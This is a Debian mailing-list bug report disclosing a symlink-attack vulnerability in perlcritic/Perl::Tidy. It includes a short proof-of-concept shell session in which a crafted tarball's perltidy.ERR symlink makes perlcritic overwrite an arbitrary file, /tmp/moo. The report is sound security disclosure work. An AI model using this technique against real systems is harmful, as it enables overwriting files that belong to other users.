Bug#834213: perlcritic: some code causes a perltidy.ERR file to be created or overwritten
Jakub Wilk
jwilk at jwilk.net
Sun May 14 14:55:09 UTC 2017
Control: tags -1 + security
* Paul Wise <pabs at debian.org>, 2016-08-13, 15:09:
>There is some code which causes perlcritic to create or overwrite a
>perltidy.ERR file in the current directory.
Perl::Tidy tries to delete existing perltidy.ERR; but if deleting fails, it
proceeds as if nothing happened. This can be abused to overwrite arbitrary
files via symlink attack:
$ tar -xvvf 834213.tar.gz
dr-xr-xr-x root/root 0 2017-05-14 16:33 834213/
-r--r--r-- root/root 2 2017-05-14 16:30 834213/badsyntax.pm
lr-xr-xr-x root/root 0 2017-05-14 16:30 834213/perltidy.ERR -> /tmp/moo
$ cd 834213
$ head -n1 /tmp/moo
head: cannot open '/tmp/moo' for reading: No such file or directory
$ perlcritic --noprofile -1 badsyntax.pm
perltidy had errors!! at line 1, column 1. See page 33 of PBP. (Severity: 1)
Module does not end with "1;" at line 1, column 1. Must end with a recognizable true value. (Severity: 4)
Code not contained in explicit package at line 1, column 1. Violates encapsulation. (Severity: 4)
No package-scoped "$VERSION" variable found at line 1, column 1. See page 404 of PBP. (Severity: 2)
Code before strictures are enabled at line 1, column 1. See page 429 of PBP. (Severity: 5)
Code before warnings are enabled at line 1, column 1. See page 431 of PBP. (Severity: 4)
$ head -n1 /tmp/moo
1: final indentation level: 1
--
Jakub Wilk
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 834213.tar.gz
Type: application/gzip
Size: 190 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/pkg-perl-maintainers/attachments/20170514/114800e2/attachment.bin>
More information about the pkg-perl-maintainers
mailing list